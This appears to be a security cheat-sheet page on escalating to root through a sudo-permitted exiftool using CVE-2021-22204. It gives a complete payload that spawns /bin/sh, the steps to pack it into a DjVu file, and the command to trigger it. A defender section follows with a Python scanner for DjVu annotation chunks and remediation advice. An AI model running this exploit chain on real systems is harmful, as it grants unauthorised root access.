Sudo Exiftool Privilege Escalation

The sudo exiftool command might be vulnerable to privilege escalation (PrivEsc).


Last updated 1 year ago

(root) NOPASSWD: /usr/local/bin/exiftool

If we can execute the "exiftool" command as root, we may be able to escalate privileges.

Check the exiftool version. If the exiftool version is later than 7.44, we can execute arbitrary code (CVE-2021-22204).

exiftool -ver

On the local machine, create the payload in a file named “exploit”.

(metadata "\c${system('/bin/sh')};")

Next, compress the file.

bzz exploit exploit.bzz

Then create the DjVu file using the compressed file.

sudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzz

Now we have the “exploit.djvu” file. Transfer the file to the target machine and run exiftool as root on the DjVu file.

sudo /usr/local/bin/exiftool exploit.djvu

We should get a root shell.
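
For defenders: the payload in the steps above travels in the DjVu annotation chunk (ANTz), so a file can be screened for annotation chunks before it is handed to a privileged exiftool. The Python below is an added example, not code from the original page or from exiftool; the function names and sample bytes are constructed for illustration, and it inspects stand-alone DjVu files only.

```python
import struct

# DjVu annotation chunk IDs: ANTa is plain text, ANTz is BZZ-compressed.
ANNOTATION_IDS = {b"ANTa", b"ANTz"}

def _walk(buf, pos, end, found):
    """Walk IFF chunks in buf[pos:end], recursing into nested FORM containers."""
    while pos + 8 <= end:
        cid = buf[pos:pos + 4]
        (size,) = struct.unpack(">I", buf[pos + 4:pos + 8])
        body = pos + 8
        if body + size > end:
            raise ValueError(f"chunk {cid!r} at offset {pos} overruns its container")
        if cid == b"FORM":
            _walk(buf, body + 4, body + size, found)  # skip the 4-byte form type
        elif cid in ANNOTATION_IDS:
            found.append((cid.decode("ascii"), pos, size))
        pos = body + size + (size & 1)  # chunk data is padded to an even length
    return found

def djvu_annotation_chunks(buf):
    """Return [(chunk_id, offset, size), ...], or None if buf is not a DjVu file."""
    if buf[:8] != b"AT&TFORM":
        return None
    return _walk(buf, 4, len(buf), [])

def _chunk(cid, data):
    """Build one IFF chunk (helper for the constructed samples below)."""
    return cid + struct.pack(">I", len(data)) + data + b"\0" * (len(data) & 1)

# Constructed samples: same chunk layout djvumake was given above (INFO, BGjp,
# ANTz), with placeholder zero bytes instead of real image or annotation data.
_PAGE = b"DJVU" + _chunk(b"INFO", bytes(10)) + _chunk(b"BGjp", b"")
SAMPLE_ANNOTATED = b"AT&T" + _chunk(b"FORM", _PAGE + _chunk(b"ANTz", bytes(5)))
SAMPLE_CLEAN = b"AT&T" + _chunk(b"FORM", _PAGE)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = djvu_annotation_chunks(fh.read())
        if hits is None:
            print(f"{path}: not a stand-alone DjVu file, not inspected")
        elif hits:
            print(f"{path}: REJECT, annotation chunks present: {hits}")
        else:
            print(f"{path}: no annotation chunks")
```

Treat a hit as a reason to reject or quarantine the file. The durable fix is to remove the sudo rule and update exiftool to a release that fixes CVE-2021-22204.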

Reference for Arbitrary Code Execution (CVE-2021-22204), version 7.44+: https://vk9-sec.com/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204/